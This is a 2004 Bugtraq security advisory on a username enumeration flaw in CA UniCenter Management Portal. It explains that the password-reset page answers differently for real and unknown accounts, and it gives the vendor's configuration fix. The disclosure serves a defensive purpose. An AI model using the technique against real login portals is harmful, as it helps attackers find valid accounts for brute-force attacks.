[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    CA UniCenter Management Portal Username Enumeration Vulnerability
From:       thomas adams <tgadams () bellsouth ! net>
Date:       2004-09-21 17:58:35
Message-ID: 20040921175835.14829.qmail () www ! securityfocus ! com
[Download RAW message or body]



CA UniCenter Management Portal Username Enumeration Vulnerability

Package: 		CA UniCenter Management Portal
Vendor Web Site:        http://www.ca.com
Versions:	        UniCenter Management Portal 2.0 and 3.1
Platform:	        Windows
Local:                  No
Remote:                 Yes
Fix Available:          Yes
Advisory Author:        Thomas Adams (tgadams@bellsouth.net)


Background:
From www.ca.com: "Unicenter Management Portal provides intuitive access to enterprise \
management information,offering a personalized web interface for various Unicenter \
management solutions. Security and administrative control are provided through \
pre-defined workplaces. Filtered event notifications can be customized to suit \
individual roles and responsibilities, for personalized views tailored to your users' \
unique needs." The portal provides a forgot password link, that does not give a \
proper response for an invalid user. Using a script, an attacker can quickly find \
users that have access to the web interface using the technique below. This will help \
facilitate brute force attacks  against the server.



Exploit:
Connect to the management portal(default 8080). Choose the 'Forgot your Password?' \
option. Enter a username, such as test. If the test account does not exists, the \
following will be displayed: "User not found: test" A legit account will produce a \
"Password has been sent" or "Email address not Found" message. 



Vendor Response:
CAs recommendation was to disable the 'Forgot Password' feature. To isable this \
option in the Portal, add the following line to the \
[PORTAL_INSTALL]\properties\local.properties file.  
show.passwords.in.api=false
 
You will need to restart the portal after manually editing the file.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic